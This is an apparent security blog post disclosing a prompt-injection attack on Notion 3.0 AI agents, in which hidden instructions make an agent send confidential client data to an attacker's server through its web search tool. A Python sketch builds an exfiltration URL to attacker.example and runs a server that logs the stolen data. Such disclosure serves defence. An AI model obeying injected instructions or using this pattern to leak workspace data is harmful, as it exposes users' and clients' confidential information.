Hidden risk in Notion 3.0 AI agents: Web search tool abuse for data exfiltration
A critical security vulnerability in Notion 3.0's AI Agents demonstrates how the combination of LLM agents, tool access, and long-term memory creates exploitable attack vectors for data exfiltration.
Notion 3.0 lets users personalize or even build teams of Custom Agents that run on triggers or schedules, giving them autonomous assistants that continuously handle tasks like compiling feedback, updating trackers, and triaging requests. These agents sit squarely in what Simon Willison calls the "lethal trifecta": access to private data, exposure to untrusted content, and the ability to communicate externally, a combination that makes them powerful but easily exploitable. In the demonstrated attack, a prompt injection hidden in untrusted content the agent ingests instructs it to collect confidential client data from the workspace and embed it in a web search query aimed at an attacker-controlled server. The agent then invokes the web search tool to send that query to the malicious server, where the attacker logs the Notion user's confidential client data.
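To make the exfiltration path concrete, here is a minimal sketch of the mechanics. The attacker endpoint (attacker.example), the query parameter name, and the sample record are all hypothetical, and nothing here is Notion's actual tool API; it only shows the generic pattern of smuggling data out through a URL fetch.

```python
# Minimal sketch of query-string exfiltration. The endpoint, parameter
# name, and data below are hypothetical; this is not Notion's tool API.
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlencode, urlparse, parse_qs

# What the injected instructions coerce the agent into doing: build a
# "search" URL whose query string carries confidential data, then hand it
# to the web search tool, which fetches it like any other URL.
confidential = "Acme renewal: $1.2M, contact jane@acme.example"  # hypothetical data
exfil_url = "https://attacker.example/search?" + urlencode({"q": confidential})
print("URL the agent is tricked into fetching:", exfil_url)

# What the attacker runs: a trivial server that logs every incoming query.
class ExfilLogger(BaseHTTPRequestHandler):
    def do_GET(self):
        query = parse_qs(urlparse(self.path).query)
        print("exfiltrated:", query.get("q", [""])[0])  # the victim's data
        self.send_response(200)
        self.end_headers()
        self.wfile.write(b"ok")  # any response keeps the tool call looking normal

if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8080), ExfilLogger).serve_forever()
```

The point of the sketch is only that a URL fetch is a write channel: anything the injected instructions can talk the agent into putting in the query string leaves the workspace and lands in the attacker's logs.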
Or read this on Hacker News